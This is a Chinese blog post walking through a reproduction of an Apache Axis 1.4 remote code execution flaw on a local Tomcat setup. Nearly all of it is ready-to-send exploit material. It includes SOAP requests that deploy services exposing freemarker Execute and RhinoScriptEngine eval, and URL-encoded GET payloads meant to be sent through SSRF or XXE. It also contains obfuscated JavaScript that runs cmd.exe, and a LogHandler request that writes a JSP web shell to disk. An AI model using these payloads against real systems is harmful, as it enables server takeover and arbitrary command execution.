• Axis <=1.4 RCE 复现


    1、环境搭建

    在idea 上新建项目,然后用tomcat运行即可

    2、漏洞复现

    2、1 freemarker.template.utility.Execute

    如果项目里面没有freemarker 就添加,这里添加的是 freemarker-2.3.30.jar

    • 创建 freemarkerTest services ,返回Done processing 即表示创建成功,同时访问services页面也可以看到freemarkerTest services
    POST /services/AdminService HTTP/1.1
    Pragma: no-cache
    Cache-Control: no-cache
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8083/services
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    SOAPAction: 
    Content-Type: text/xml;charset=UTF-8
    Host: localhost:8083
    Content-Length: 632
    
    <?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <soapenv:Body>
        <deployment xmlns="http://xml.apache.org/axis/wsdd/"
                    xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
           <service name="freemarkerTest" provider="java:RPC">
    		<parameter name="className" value="freemarker.template.utility.Execute"/>
    		<parameter name="allowedMethods" value="*"/>
           </service>
        </deployment>
      </soapenv:Body>
    </soapenv:Envelope>
    
    • GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
    !--><deployment xmlns="http://xml.apache.org/axis/wsdd/"
                    xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
           <service name="freemarkerTest" provider="java:RPC">
    		<parameter name="className" value="freemarker.template.utility.Execute"/>
    		<parameter name="allowedMethods" value="*"/>
           </service>
        </deployment
    

    进行urlencode

    %21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%2f%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%2a%22%2f%3e%0a%20%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74
    
    http://localhost:8083/services/AdminService?method= 将urlencode之后的值放在此处
    

    • 执行命令
    POST /services/freemarkerTest HTTP/1.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8083/services
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    SOAPAction: 
    Content-Type: text/xml;charset=UTF-8
    Host: localhost:8083
    Content-Length: 671
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <soapenv:Body>
        <exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
          <arg0 href="#id0"/>
        </exec>
        <multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
          <multiRef xsi:type="soapenc:string">cmd.exe /c echo 111111</multiRef>
        </multiRef>
      </soapenv:Body>
    </soapenv:Envelope>
    

    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://utility.template.freemarker" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
       <soapenv:Header/>
       <soapenv:Body>
          <util:exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
             <arguments>
                <string xsi:type="soapenc:string">cmd.exe /c whoami</string>
             </arguments>
          </util:exec>
       </soapenv:Body>
    </soapenv:Envelope>
    

    • 卸载service
    POST /services/AdminService HTTP/1.1
    Pragma: no-cache
    Cache-Control: no-cache
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8083/services
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    SOAPAction: 
    Content-Type: text/xml;charset=UTF-8
    Host: localhost:8083
    Content-Length: 395
    
    <?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <soapenv:Body>
        <undeployment xmlns="http://xml.apache.org/axis/wsdd/">
          <service name="freemarkerTest"/>
        </undeployment>
      </soapenv:Body>
    </soapenv:Envelope>
    
    http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74
    

    2、2 com.sun.script.javascript.RhinoScriptEngine

    jdk <= 1.7 可用 本地复现用的 jdk 1.7.0_79

    • 创建services
    POST /services/AdminService HTTP/1.1
    Pragma: no-cache
    Cache-Control: no-cache
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8083/services
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    SOAPAction: 
    Content-Type: text/xml;charset=UTF-8
    Host: localhost:8083
    Content-Length: 1074
    
    <?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <soapenv:Body>
        <deployment xmlns="http://xml.apache.org/axis/wsdd/"
                    xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
           <service name="RhinoScriptEngineServiceTest" provider="java:RPC">
              <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />
              <parameter name="allowedMethods" value="eval" />
              <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"
                         type="java:javax.script.SimpleScriptContext"
                         qname="ns:SimpleScriptContext"
                         serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"
                         xmlns:ns="urn:beanservice" regenerateElement="false">
              </typeMapping>
          </service>
        </deployment>
      </soapenv:Body>
    </soapenv:Envelope>
    
    • GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
    !--><deployment xmlns="http://xml.apache.org/axis/wsdd/"
                    xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
           <service name="RhinoScriptEngineServiceTest" provider="java:RPC">
              <parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />
              <parameter name="allowedMethods" value="eval" />
              <typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"
                         type="java:javax.script.SimpleScriptContext"
                         qname="ns:SimpleScriptContext"
                         serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"
                         xmlns:ns="urn:beanservice" regenerateElement="false">
              </typeMapping>
          </service>
        </deployment
    

    进行urlencode

    http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%63%6f%6d%2e%73%75%6e%2e%73%63%72%69%70%74%2e%6a%61%76%61%73%63%72%69%70%74%2e%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%65%76%61%6c%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%74%79%70%65%4d%61%70%70%69%6e%67%20%64%65%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%44%65%73%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%79%70%65%3d%22%6a%61%76%61%3a%6a%61%76%61%78%2e%73%63%72%69%70%74%2e%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%71%6e%61%6d%65%3d%22%6e%73%3a%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%53%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6e%73%3d%22%75%72%6e%3a%62%65%61%6e%73%65%72%76%69%63%65%22%20%72%65%67%65%6e%65%72%61%74%65%45%6c%65%6d%65%6e%74%3d%22%66%61%6c%73%65%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%2f%74%79%70%65%4d%61%70%70%69%6e%67%3e%0a%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74
    
    • 执行命令
    <?xml version='1.0' encoding='UTF-8'?>
    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
      <soapenv:Body>
        <eval xmlns="http://localhost:8083/services/scriptEngine">
          <arg0 xmlns=""><![CDATA[function test(){var cmd1='c'; cmd1 += 'm';cmd1 += 'd';cmd1 += '.';cmd1 += 'e';   cmd1 += 'x';cmd1 += 'e';var cmd2 = '/'; cmd2 += 'c'; var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'ver');var process = pb.start(); var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\A').next();return ret;}test();]]>
          </arg0>
          <arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"></arg1>
        </eval>
      </soapenv:Body>
    </soapenv:Envelope>
    
    • 卸载service
    <?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <soapenv:Body>
        <undeployment xmlns="http://xml.apache.org/axis/wsdd/">
          <service name="RhinoScriptEngineServiceTest"/>
        </undeployment>
      </soapenv:Body>
    </soapenv:Envelope>
    
    http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74
    

    2、3 写文件

    • 创建service
    <?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <soapenv:Body>
        <deployment xmlns="http://xml.apache.org/axis/wsdd/"
                    xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
           <service name="writeFile2" provider="java:RPC">
    		<requestFlow>
                <handler type="java:org.apache.axis.handlers.LogHandler" >
                    <parameter name="LogHandler.fileName" value="F:/work/SpringStudy/out/artifacts/axis_rce_test_war_exploded/shell123.jsp" />
                    <parameter name="LogHandler.writeToConsole" value="false" />
                </handler>
             </requestFlow>
              <parameter name="className" value="java.util.Random" />
              <parameter name="allowedMethods" value="*" />
           </service>
        </deployment>
      </soapenv:Body>
    </soapenv:Envelope>
    
    • 写文件
    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">
       <soapenv:Header/>
       <soapenv:Body>
          <util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
             <in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><![CDATA[
    <%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
    ]]></in0>
             <in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>
          </util:ints>
       </soapenv:Body>
    </soapenv:Envelope>
    

    参考

  • 相关阅读:
    Vue.js
    Vue.js
    Vue.js
    Vue.js
    webpack(1)
    webpack(2)
    babel-loader7和babel8版本的问题
    [JZOJ4274] 终章-剑之魂
    [JZOJ427] 圣章-精灵使的魔法语
    BZOJ题表(红色表示已完成)
  • 原文地址:https://www.cnblogs.com/depycode/p/14844984.html
Copyright © 2020-2023  润新知